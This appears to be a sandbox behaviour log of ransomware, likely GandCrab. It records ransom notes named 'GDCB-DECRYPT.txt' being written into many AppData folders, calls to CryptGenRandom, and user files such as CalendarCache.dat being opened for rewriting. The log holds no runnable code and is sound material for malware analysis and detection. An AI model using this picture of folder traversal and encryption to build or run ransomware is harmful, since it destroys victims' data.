File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\Dictionaries\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
